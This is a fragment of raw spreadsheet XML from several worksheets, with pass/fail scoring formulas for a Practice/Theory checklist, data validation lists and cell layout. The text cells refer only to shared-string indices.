        <v>13</v>
      </c>
      <c r="E172" s="89" t="s">
        <v>303</v>
      </c>
      <c r="F172" s="90">
        <f>SUM(F173:F174)</f>
        <v>0</v>
      </c>
      <c r="G172" s="89" t="s">
        <v>13</v>
      </c>
      <c r="H172" s="91" t="e">
        <f>IF(AND(H173&gt;=$I$162,H174&gt;=$I$162),"Passed","Failed")</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I172" s="89" t="s">
        <v>308</v>
      </c>
      <c r="L172" s="99">
        <v>0.6</v>
      </c>
      <c r="M172" s="100" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="173" ht="15" customHeight="1" spans="3:13">
      <c r="D173" s="97"/>
      <c r="E173" s="89" t="s">
        <v>23</v>
      </c>
      <c r="F173" s="90">
        <f>COUNTIFS($E$4:$E$160,E173,$J$4:$J$160,"YES")+COUNTIFS($E$4:$E$160,E173,$J$4:$J$160,"NO")</f>
        <v>0</v>
      </c>
      <c r="G173" s="89" t="s">
        <v>23</v>
      </c>
      <c r="H173" s="101" t="e">
        <f>COUNTIFS($E$4:$E$160,G173,$J$4:$J$160,"YES")/F173*100%</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I173" s="88" t="e">
        <f>VLOOKUP(H173,$L$170:$M$174,2,TRUE)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L173" s="99">
        <v>0.75</v>
      </c>
      <c r="M173" s="100" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="174" ht="15" customHeight="1" spans="3:13">
      <c r="D174" s="97"/>
      <c r="E174" s="89" t="s">
        <v>17</v>
      </c>
      <c r="F174" s="90">
        <f>COUNTIFS($E$4:$E$160,E174,$J$4:$J$160,"YES")+COUNTIFS($E$4:$E$160,E174,$J$4:$J$160,"NO")</f>
        <v>0</v>
      </c>
      <c r="G174" s="89" t="s">
        <v>17</v>
      </c>
      <c r="H174" s="101" t="e">
        <f>COUNTIFS($E$4:$E$160,G174,$J$4:$J$160,"YES")/F174*100%</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I174" s="88" t="e">
        <f>VLOOKUP(H174,$L$170:$M$174,2,TRUE)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L174" s="99">
        <v>0.9</v>
      </c>
      <c r="M174" s="100" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="175" ht="15" customHeight="1"/>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="C3:M160" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <mergeCells count="30">
    <mergeCell ref="I2:J2"/>
    <mergeCell ref="G162:H162"/>
    <mergeCell ref="G167:H167"/>
    <mergeCell ref="L169:M169"/>
    <mergeCell ref="B2:B3"/>
    <mergeCell ref="C2:C3"/>
    <mergeCell ref="C4:C11"/>
    <mergeCell ref="C12:C29"/>
    <mergeCell ref="C30:C32"/>
    <mergeCell ref="C33:C63"/>
    <mergeCell ref="C64:C67"/>
    <mergeCell ref="C68:C76"/>
    <mergeCell ref="C77:C101"/>
    <mergeCell ref="C102:C103"/>
    <mergeCell ref="C104:C112"/>
    <mergeCell ref="C113:C124"/>
    <mergeCell ref="C125:C129"/>
    <mergeCell ref="C130:C147"/>
    <mergeCell ref="C149:C159"/>
    <mergeCell ref="D2:D3"/>
    <mergeCell ref="D168:D170"/>
    <mergeCell ref="D172:D174"/>
    <mergeCell ref="E2:E3"/>
    <mergeCell ref="F2:F3"/>
    <mergeCell ref="G2:G3"/>
    <mergeCell ref="H2:H3"/>
    <mergeCell ref="J164:J165"/>
    <mergeCell ref="K2:K3"/>
    <mergeCell ref="L2:L3"/>
    <mergeCell ref="M2:M3"/>
  </mergeCells>
  <conditionalFormatting sqref="H163">
    <cfRule type="cellIs" dxfId="0" priority="2" operator="equal">
      <formula>"Passed"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="6" operator="equal">
      <formula>"Failed"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H168">
    <cfRule type="cellIs" dxfId="0" priority="3" operator="equal">
      <formula>"Passed"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="5" operator="equal">
      <formula>"Failed"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H172">
    <cfRule type="cellIs" dxfId="0" priority="1" operator="equal">
      <formula>"Passed"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="4" operator="equal">
      <formula>"Failed"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="3">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="E4:E160">
      <formula1>"Practice, Theory"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="M4:M160">
      <formula1>"Mandatory"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="H4:J160">
      <formula1>"YES, NO, N/A"</formula1>
    </dataValidation>
  </dataValidation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5"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A16" workbookViewId="0">
      <selection activeCell="C16" sqref="C16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4" outlineLevelCol="4"/>
  <cols>
    <col min="1" max="1" width="54.5555555555556" customWidth="1"/>
    <col min="2" max="2" width="63.8888888888889" customWidth="1"/>
    <col min="3" max="3" width="54.4259259259259" customWidth="1"/>
    <col min="4" max="4" width="22" customWidth="1"/>
    <col min="5" max="5" width="36.8611111111111" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4">
      <c r="A1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:4">
      <c r="A2" s="2"/>
      <c r="B2" s="18"/>
    </row>
    <row r="3" ht="57.6" spans="1:4">
      <c r="A3" s="19" t="s">
        <v>643</v>
      </c>
      <c r="B3" s="20" t="s">
        <v>644</v>
      </c>
    </row>
    <row r="4" ht="57.6" spans="1:4">
      <c r="A4" s="3" t="s">
        <v>645</v>
      </c>
      <c r="B4" s="5" t="s">
        <v>646</v>
      </c>
    </row>
    <row r="5" ht="45" customHeight="1" spans="1:4">
      <c r="A5" s="21" t="s">
        <v>647</v>
      </c>
      <c r="B5" s="22" t="s">
        <v>648</v>
      </c>
    </row>
    <row r="6" spans="1:4">
      <c r="A6" s="21"/>
      <c r="B6" s="22"/>
    </row>
    <row r="7" spans="1:4">
      <c r="A7" s="21"/>
      <c r="B7" s="22"/>
    </row>
    <row r="8" spans="1:4">
      <c r="A8" s="21"/>
      <c r="B8" s="22"/>
    </row>
    <row r="9" ht="30" customHeight="1" spans="1:4">
      <c r="A9" s="23"/>
      <c r="B9" s="24"/>
    </row>
    <row r="10" ht="129.6" spans="1:4">
      <c r="A10" s="22" t="s">
        <v>649</v>
      </c>
      <c r="B10" s="15" t="s">
        <v>650</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>651</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>652</v>
      </c>
    </row>
    <row r="11" ht="100.8" spans="1:4">
      <c r="A11" s="1" t="s">
        <v>653</v>
      </c>
      <c r="B11" s="25" t="s">
        <v>654</v>
      </c>
    </row>
    <row r="12" ht="86.4" spans="1:4">
      <c r="A12" s="15" t="s">
        <v>655</v>
      </c>
      <c r="B12" s="15" t="s">
        <v>656</v>
      </c>
    </row>
    <row r="13" ht="43.2" spans="1:4">
      <c r="A13" s="3" t="s">
        <v>657</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>658</v>
      </c>
    </row>
    <row r="14" ht="57.6" spans="1:4">
      <c r="A14" s="5" t="s">
        <v>659</v>
      </c>
      <c r="B14" s="5" t="s">
        <v>660</v>
      </c>
    </row>
    <row r="15" ht="43.2" spans="1:4">
      <c r="A15" s="26" t="s">
        <v>661</v>
      </c>
      <c r="B15" s="27" t="s">
        <v>662</v>
      </c>
    </row>
    <row r="16" ht="388.8" spans="1:4">
      <c r="A16" s="1" t="s">
        <v>663</v>
      </c>
      <c r="B16" s="22" t="s">
        <v>664</v>
      </c>
    </row>
    <row r="17" ht="216" spans="1:5">
      <c r="A17" s="3" t="s">
        <v>665</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="18" ht="115.2" spans="1:5">
      <c r="A18" s="3" t="s">
        <v>667</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>668</v>
      </c>
    </row>
    <row r="19" ht="230.4" spans="1:5">
      <c r="A19" s="1" t="s">
        <v>669</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="20" ht="100.8" spans="1:5">
      <c r="A20" s="1" t="s">
        <v>671</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>672</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="21" ht="72" spans="1:5">
      <c r="A21" s="1" t="s">
        <v>674</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>675</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>676</v>
      </c>
    </row>
    <row r="22" ht="72" spans="1:5">
      <c r="A22" s="1" t="s">
        <v>677</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>678</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>679</v>
      </c>
    </row>
    <row r="23" ht="43.2" spans="1:5">
      <c r="A23" s="1" t="s">
        <v>680</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>681</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>682</v>
      </c>
      <c r="D23" s="5" t="s">
        <v>683</v>
      </c>
    </row>
    <row r="24" ht="129.6" spans="1:5">
      <c r="A24" s="1" t="s">
        <v>684</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>685</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>686</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>687</v>
      </c>
      <c r="E24" s="1" t="s">
        <v>688</v>
      </c>
    </row>
    <row r="25" ht="129.6" spans="1:5">
      <c r="A25" s="1" t="s">
        <v>689</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>690</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>691</v>
      </c>
    </row>
    <row r="26" ht="129.6" spans="1:5">
      <c r="A26" s="1" t="s">
        <v>692</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>693</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>694</v>
      </c>
    </row>
    <row r="27" ht="72" spans="1:5">
      <c r="A27" s="1" t="s">
        <v>695</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>696</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="28" ht="187.2" spans="1:5">
      <c r="A28" s="1" t="s">
        <v>698</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>699</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>700</v>
      </c>
    </row>
    <row r="29" ht="115.2" spans="1:5">
      <c r="A29" s="1" t="s">
        <v>701</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>702</v>
      </c>
      <c r="C29" s="1"/>
    </row>
    <row r="30" ht="86.4" spans="1:5">
      <c r="A30" s="1" t="s">
        <v>703</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>704</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="31" ht="28.8" spans="1:5">
      <c r="A31" s="1" t="s">
        <v>706</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>707</v>
      </c>
      <c r="C31" s="1"/>
    </row>
    <row r="32" ht="72" spans="1:5">
      <c r="A32" s="1" t="s">
        <v>708</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>709</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>710</v>
      </c>
    </row>
    <row r="33" ht="57.6" spans="1:4">
      <c r="A33" s="1" t="s">
        <v>711</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>712</v>
      </c>
      <c r="C33" s="1"/>
    </row>
    <row r="34" ht="57.6" spans="1:4">
      <c r="A34" s="1" t="s">
        <v>713</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>714</v>
      </c>
      <c r="C34" s="1"/>
    </row>
    <row r="35" ht="72" spans="1:4">
      <c r="A35" s="3" t="s">
        <v>715</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>716</v>
      </c>
      <c r="C35" s="1"/>
    </row>
    <row r="36" ht="57.6" spans="1:4">
      <c r="A36" s="1" t="s">
        <v>717</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>718</v>
      </c>
      <c r="C36" s="1"/>
    </row>
    <row r="37" ht="72" spans="1:4">
      <c r="A37" s="1" t="s">
        <v>719</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>720</v>
      </c>
      <c r="C37" s="1"/>
    </row>
    <row r="38" ht="100.8" spans="1:4">
      <c r="A38" s="1" t="s">
        <v>721</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>722</v>
      </c>
      <c r="C38" s="1"/>
    </row>
    <row r="39" ht="86.4" spans="1:4">
      <c r="A39" s="1" t="s">
        <v>723</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>724</v>
      </c>
      <c r="C39" s="1"/>
    </row>
    <row r="40" ht="86.4" spans="1:4">
      <c r="A40" s="1" t="s">
        <v>725</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>726</v>
      </c>
      <c r="C40" s="1"/>
    </row>
    <row r="41" ht="57.6" spans="1:4">
      <c r="A41" s="1" t="s">
        <v>727</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>728</v>
      </c>
      <c r="C41" s="1"/>
      <c r="D41" s="1"/>
    </row>
    <row r="42" ht="100.8" spans="1:4">
      <c r="A42" s="1" t="s">
        <v>729</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>730</v>
      </c>
      <c r="C42" s="1"/>
      <c r="D42" s="1"/>
    </row>
    <row r="43" ht="144" spans="1:4">
      <c r="A43" s="1" t="s">
        <v>731</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>732</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>733</v>
      </c>
      <c r="D43" s="1"/>
    </row>
    <row r="44" ht="273.6" spans="1:4">
      <c r="A44" s="1" t="s">
        <v>734</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>735</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>736</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>737</v>
      </c>
    </row>
    <row r="45" ht="144" spans="1:4">
      <c r="A45" s="1" t="s">
        <v>738</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>739</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>740</v>
      </c>
      <c r="D45" s="1"/>
    </row>
    <row r="46" spans="1:4">
      <c r="A46" s="1"/>
      <c r="B46" s="1"/>
      <c r="C46" s="1"/>
      <c r="D46" s="1"/>
    </row>
    <row r="47" spans="1:4">
      <c r="A47" s="1"/>
      <c r="B47" s="1"/>
      <c r="C47" s="1"/>
      <c r="D47" s="1"/>
    </row>
    <row r="48" spans="1:4">
      <c r="A48" s="1"/>
      <c r="B48" s="1"/>
      <c r="C48" s="1"/>
      <c r="D48" s="1"/>
    </row>
    <row r="49" spans="1:4">
      <c r="A49" s="1"/>
      <c r="B49" s="1"/>
      <c r="C49" s="1"/>
      <c r="D49" s="1"/>
    </row>
    <row r="50" spans="1:4">
      <c r="A50" s="1"/>
      <c r="B50" s="1"/>
      <c r="C50" s="1"/>
      <c r="D50" s="1"/>
    </row>
    <row r="51" spans="1:4">
      <c r="A51" s="1"/>
      <c r="B51" s="1"/>
      <c r="C51" s="1"/>
      <c r="D51" s="1"/>
    </row>
    <row r="52" spans="1:4">
      <c r="A52" s="1"/>
      <c r="B52" s="1"/>
      <c r="C52" s="1"/>
      <c r="D52" s="1"/>
    </row>
    <row r="53" spans="1:4">
      <c r="A53" s="1"/>
      <c r="B53" s="1"/>
      <c r="C53" s="1"/>
      <c r="D53" s="1"/>
    </row>
    <row r="54" spans="1:4">
      <c r="A54" s="1"/>
      <c r="B54" s="1"/>
      <c r="C54" s="1"/>
      <c r="D54" s="1"/>
    </row>
    <row r="55" spans="1:4">
      <c r="A55" s="1"/>
      <c r="B55" s="1"/>
      <c r="C55" s="1"/>
      <c r="D55" s="1"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="A5:A9"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="B5:B9"/>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3" sqref="C3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4" outlineLevelRow="4" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="26.6666666666667" customWidth="1"/>
    <col min="2" max="2" width="57.1111111111111" customWidth="1"/>
    <col min="3" max="3" width="53.5555555555556" customWidth="1"/>
    <col min="4" max="4" width="55.3333333333333" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4">
      <c r="A1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C1" s="8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:4">
      <c r="A2" s="2"/>
      <c r="B2" s="8"/>
      <c r="C2" s="8"/>
    </row>
    <row r="3" ht="244.8" spans="1:4">
      <c r="A3" s="3" t="s">
        <v>741</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>742</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>743</v>
      </c>
    </row>
    <row r="4" ht="144" spans="1:4">
      <c r="A4" s="5" t="s">
        <v>744</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>745</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>746</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>747</v>
      </c>
    </row>
    <row r="5" ht="57.6" spans="1:4">
      <c r="A5" t="s">
        <v>748</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>749</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:C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topLeftCell="A14" workbookViewId="0">
      <selection activeCell="B19" sqref="B19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="38.4444444444444" customWidth="1"/>
    <col min="2" max="2" width="111.666666666667" customWidth="1"/>
    <col min="3" max="3" width="59.8888888888889" customWidth="1"/>
    <col min="4" max="4" width="49.4444444444444" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4">
      <c r="A1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:4">
      <c r="A2" s="2"/>
      <c r="B2" s="8"/>
    </row>
    <row r="3" ht="100.8" spans="1:4">
      <c r="A3" s="15" t="s">
        <v>750</v>
      </c>
      <c r="B3" s="15" t="s">
        <v>751</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>752</v>
      </c>
    </row>
    <row r="4" ht="57.6" spans="1:4">
      <c r="A4" s="15" t="s">
        <v>753</v>
      </c>
      <c r="B4" s="15" t="s">
        <v>754</v>
      </c>
    </row>
    <row r="5" ht="100.8" spans="1:4">
      <c r="A5" s="15" t="s">
        <v>755</v>
      </c>
      <c r="B5" s="15" t="s">
        <v>756</v>
      </c>
    </row>
    <row r="6" ht="72" spans="1:4">
      <c r="A6" s="15" t="s">
        <v>757</v>
      </c>
      <c r="B6" s="15" t="s">
        <v>758</v>
      </c>
    </row>
    <row r="7" ht="158.4" spans="1:4">
      <c r="A7" s="16" t="s">
        <v>759</v>
      </c>
      <c r="B7" s="15" t="s">
        <v>760</v>
      </c>
    </row>
    <row r="8" ht="86.4" spans="1:4">
      <c r="A8" s="16" t="s">
        <v>761</v>
      </c>
      <c r="B8" s="15" t="s">
        <v>762</v>
      </c>
    </row>
    <row r="9" ht="144" spans="1:4">
      <c r="A9" s="16" t="s">
        <v>763</v>
      </c>
      <c r="B9" s="15" t="s">
        <v>764</v>
      </c>
    </row>
    <row r="10" ht="100.8" spans="1:4">
      <c r="A10" s="15" t="s">
        <v>765</v>
      </c>
      <c r="B10" s="15" t="s">
        <v>766</v>
      </c>
    </row>
    <row r="11" ht="288" spans="1:4">
      <c r="A11" s="15" t="s">
        <v>767</v>
      </c>
      <c r="B11" s="15" t="s">
        <v>768</v>
      </c>
    </row>
    <row r="12" ht="316.8" spans="1:4">
      <c r="A12" s="16" t="s">
        <v>769</v>
      </c>
      <c r="B12" s="15" t="s">
        <v>770</v>
      </c>
    </row>
    <row r="13" ht="316.8" spans="1:4">
      <c r="A13" s="1" t="s">
        <v>771</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>772</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>773</v>
      </c>
    </row>
    <row r="14" ht="144" spans="1:4">
      <c r="A14" s="1" t="s">
        <v>774</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>775</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>776</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>777</v>
      </c>
    </row>
    <row r="15" ht="28.8" spans="1:4">
      <c r="A15" s="3" t="s">
        <v>778</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>779</v>
      </c>
    </row>
    <row r="16" ht="57.6" spans="1:4">
      <c r="A16" s="1" t="s">
        <v>780</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>781</v>
      </c>
    </row>
    <row r="17" ht="28.8" spans="1:4">
      <c r="A17" s="3" t="s">
        <v>782</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>783</v>
      </c>
    </row>
    <row r="18" ht="28.8" spans="1:4">
      <c r="A18" s="1" t="s">
        <v>784</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="19" ht="57.6" spans="1:4">
      <c r="A19" s="1" t="s">
        <v>786</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>787</v>
      </c>
    </row>
    <row r="20" ht="75" spans="1:4">
      <c r="A20" s="17" t="s">
        <v>788</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>789</v>
      </c>
    </row>
    <row r="21" ht="28.8" spans="1:4">
      <c r="A21" s="1" t="s">
        <v>790</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>791</v>
      </c>
    </row>
    <row r="22" ht="345.6" spans="1:4">
      <c r="A22" s="3" t="s">
        <v>792</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>793</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>794</v>
      </c>
      <c r="D22" s="5" t="s">
        <v>795</v>
      </c>
    </row>
    <row r="23" ht="409.5" spans="1:4">
      <c r="A23" s="3" t="s">
        <v>796</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>797</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>798</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>799</v>
      </c>
    </row>
    <row r="24" ht="43.2" spans="1:4">
      <c r="A24" s="3" t="s">
        <v>800</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>801</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>802</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>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B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="54.1111111111111" customWidth="1"/>
    <col min="2" max="2" width="68.6666666666667" customWidth="1"/>
    <col min="3" max="3" width="52.5555555555556" customWidth="1"/>
    <col min="4" max="4" width="51.6666666666667" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4">
      <c r="A1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:4">
      <c r="A2" s="2"/>
      <c r="B2" s="8"/>
    </row>
    <row r="3" ht="230.4" spans="1:4">
      <c r="A3" s="1" t="s">
        <v>803</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>804</v>
      </c>
    </row>
    <row r="4" ht="172.8" spans="1:4">
      <c r="A4" s="1" t="s">
        <v>805</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>806</v>
      </c>
    </row>
    <row r="5" ht="57.6" spans="1:4">
      <c r="A5" s="5" t="s">
        <v>807</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>808</v>
      </c>
    </row>
    <row r="6" ht="43.2" spans="1:4">
      <c r="A6" s="1" t="s">
        <v>809</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>810</v>
      </c>
    </row>
    <row r="7" ht="86.4" spans="1:4">
      <c r="A7" s="1" t="s">
        <v>811</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>812</v>
      </c>
    </row>
    <row r="8" ht="86.4" spans="1:4">
      <c r="A8" s="1" t="s">
        <v>813</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>815</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>816</v>
      </c>
    </row>
    <row r="9" ht="187.2" spans="1:4">
      <c r="A9" s="1" t="s">
        <v>817</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>818</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>819</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>820</v>
      </c>
    </row>
    <row r="10" ht="129.6" spans="1:4">
      <c r="B10" s="1" t="s">
        <v>821</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>822</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>823</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
  </mergeCell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B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4" outlineLevelRow="7" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="39.6666666666667" customWidth="1"/>
    <col min="2" max="2" width="53.1111111111111" customWidth="1"/>
    <col min="3" max="3" width="41.5555555555556" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3">
      <c r="A1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C1" s="8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:3">
      <c r="A2" s="2"/>
      <c r="B2" s="8"/>
      <c r="C2" s="8"/>
    </row>
    <row r="3" ht="144" spans="1:3">
      <c r="A3" s="3" t="s">
        <v>824</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>825</v>
      </c>
    </row>
    <row r="4" ht="72" spans="1:3">
      <c r="A4" s="3" t="s">
        <v>826</v>
      </c>
      <c r="B4" s="5" t="s">
        <v>827</v>
      </c>
    </row>
    <row r="5" ht="144" spans="1:3">
      <c r="A5" s="3" t="s">
        <v>828</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="6" ht="316.8" spans="1:3">
      <c r="A6" s="3" t="s">
        <v>830</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>831</v>
      </c>
    </row>
    <row r="7" ht="409.5" spans="1:3">
      <c r="A7" s="3" t="s">
        <v>832</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>833</v>
      </c>
    </row>
    <row r="8" ht="115.2" spans="1:3">
      <c r="A8" s="1" t="s">
        <v>834</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>835</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>836</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:C2"/>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opLeftCell="A43" workbookViewId="0">
      <selection activeCell="D44" sqref="D44"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="36.6666666666667" customWidth="1"/>
    <col min="2" max="2" width="48.8888888888889" customWidth="1"/>
    <col min="3" max="3" width="64.6666666666667" customWidth="1"/>
    <col min="4" max="4" width="104.555555555556" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4">
      <c r="A1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C1" s="8" t="s">
        <v>837</v>
      </c>
      <c r="D1" s="8" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="2" spans="1:4">
      <c r="A2" s="2"/>
      <c r="B2" s="8"/>
      <c r="C2" s="8"/>
      <c r="D2" s="8"/>
    </row>
    <row r="3" ht="201.6" spans="1:4">
      <c r="A3" s="1" t="s">
        <v>838</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>839</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>840</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>841</v>
      </c>
    </row>
    <row r="4" ht="129.6" spans="1:4">
      <c r="A4" s="1" t="s">
        <v>842</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>843</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>844</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>845</v>
      </c>
    </row>
